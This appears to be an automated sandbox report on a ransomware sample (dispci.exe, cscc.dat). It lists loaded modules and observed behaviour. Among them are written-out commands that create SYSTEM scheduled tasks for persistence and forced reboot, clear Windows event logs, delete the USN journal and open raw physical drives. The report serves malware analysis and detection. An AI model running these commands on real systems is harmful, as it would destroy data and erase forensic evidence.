        Source: C:\Windows\System32\LogonUI.exe Section loaded: windows.ui.logon.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: wincorlib.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: dcomp.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: windows.ui.xamlhost.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: mrmcorer.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: windows.ui.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: windowmanagementapi.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: textinputframework.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: inputhost.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: coremessaging.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: coreuicomponents.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: coremessaging.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: coremessaging.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: coreuicomponents.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: ntmarta.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: languageoverlayutil.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: bcp47mrm.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: windows.ui.xaml.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: windows.ui.immersive.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: dwrite.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: d3d11.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: windows.globalization.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: d3d10warp.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: dxcore.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: d2d1.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: directmanipulation.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: textshaping.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: windows.ui.xaml.controls.dll
        Source: C:\Windows\System32\LogonUI.exe Section loaded: uiautomationcore.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
        Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
        Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
        Source: C:\Windows\dispci.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
        Source: DECRYPT.lnk.23.drLNK file: ..\..\..\Windows\dispci.exe
        Source: download.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: lsasrv.pdb source: 2594.tmp, 0000000B.00000003.1719410656.0000000002EF6000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: lsasrv.pdbUGP source: 2594.tmp, 0000000B.00000003.1719410656.0000000002EF6000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000002.00000003.1717652685.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696516164.0000000002C9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1754801710.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.1696854067.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.2.dr
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04859016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,2_2_04859016
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF79B5 push ecx; ret 23_2_00DF79C8

        Persistence and Installation Behavior

        Source: C:\Windows\dispci.exe | Code function: __snwprintf,_malloc,CreateFileW,DeviceIoControl,CloseHandle,_free, \\.\PhysicalDrive%d 23_2_00DF39E0
        Source: C:\Windows\SysWOW64\rundll32.exe | Executable created and started: C:\Windows\2594.tmp
        Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows\dispci.exe
        Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\cscc.dat
        Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\dispci.exe
        Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\cscc.dat
        Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\dispci.exe

        Boot Survival

        Source: C:\Windows\dispci.exe | Code function: __snwprintf,_malloc,CreateFileW,DeviceIoControl,CloseHandle,_free, \\.\PhysicalDrive%d 23_2_00DF39E0
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04859534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, 2_2_04859534
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\LogonUI.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\LogonUI.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess (graph_2-4958)
        Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_2-4961)
        Source: C:\Windows\dispci.exe | Code function: 23_2_00DF3FC0 rdtsc 23_2_00DF3FC0
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: memset,memset,GetAdaptersInfo,GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,inet_addr,inet_addr,inet_addr,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,htonl,LocalAlloc,inet_addr,htonl,htonl,CreateThread,CloseHandle,LocalFree, 2_2_04858B2E
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetAdaptersInfo,NetServerGetInfo,NetApiBufferFree, 2_2_04857D4E
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetAdaptersInfo,GetComputerNameExW,DhcpEnumSubnets,DhcpGetSubnetInfo,DhcpEnumSubnetClients,htonl,htonl,htonl,inet_ntoa,GetProcessHeap,HeapFree,DhcpRpcFreeMemory,DhcpRpcFreeMemory, 2_2_04858D39
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 300000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 900000
        Source: C:\Windows\SysWOW64\rundll32.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) (graph_2-5687)
        Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Windows\cscc.dat
        Source: C:\Windows\dispci.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep (graph_23-8288)
        Source: C:\Windows\2594.tmp | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_11-3496)
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7724 | Thread sleep time: -300000s >= -30000s
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7416 | Thread sleep time: -900000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7576 | Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04855E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose, 2_2_04855E9F
        Source: C:\Windows\dispci.exe | Code function: 23_2_00DF1B80 PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,PathFindExtensionW,FindNextFileW,FindClose, 23_2_00DF1B80
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04855A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile, 2_2_04855A73
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 300000
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 900000
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1754801710.0000000002D00000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node (graph_2-4880)
        Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node (graph_2-4969)
        Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node (graph_2-4862)
        Source: C:\Windows\2594.tmp | API call chain: ExitProcess graph end node (graph_11-3497)
        Source: C:\Windows\System32\cdd.dll | System information queried: ModuleInformation
        Source: C:\Windows\2594.tmp | Process information queried: ProcessInformation
        Source: C:\Windows\dispci.exe | Code function: 23_2_00DF3FC0 rdtsc 23_2_00DF3FC0
        Source: C:\Windows\2594.tmp | Code function: 11_2_00007FF73CFC5540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00007FF73CFC5540
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04859016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect, 2_2_04859016
        Source: C:\Users\user\Desktop\download.exe | Code function: 0_2_00C010C0 GetModuleHandleW,GetModuleFileNameW,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree, 0_2_00C010C0
        Source: C:\Windows\2594.tmp | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\download.exe | Code function: 0_2_00C01499 SetUnhandledExceptionFilter,UnhandledExcep,GetCurrentProcess,TerminateProcess, 0_2_00C01499
        Source: C:\Windows\2594.tmp | Code function: 11_2_00007FF73CFC5540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00007FF73CFC5540
        Source: C:\Windows\2594.tmp | Code function: 11_2_00007FF73CFC71F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00007FF73CFC71F0
        Source: C:\Windows\2594.tmp | Code function: 11_2_00007FF73CFC57FC SetUnhandledExceptionFilter, 11_2_00007FF73CFC57FC
        Source: C:\Windows\dispci.exe | Code function: 23_2_00DF5C9F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_00DF5C9F
        Source: C:\Windows\dispci.exe | Code function: 23_2_00DFA966 SetUnhandledExceptionFilter, 23_2_00DFA966
        Source: C:\Windows\dispci.exe | Code function: 23_2_00DF7757 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_00DF7757

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.168.2.0 139
        Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 192.168.2.1 80
        Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 173.222.162.32 445
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 3065482610
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04856FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle, 2_2_04856FFE
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0485841D GetCurrentProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateToken,AllocateAndInitializeSid,CheckTokenMembership,TerminateProcess,FreeSid,CloseHandle,CloseHandle,CloseHandle, 2_2_0485841D
        Source: C:\Windows\dispci.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\LogonUI.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
        Source: C:\Windows\System32\LogonUI.exe | Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04856FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle, 2_2_04856FFE
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04858192 GetLocalTime,GetSystemDirectoryW,PathAppendW,wsprintfW, 2_2_04858192
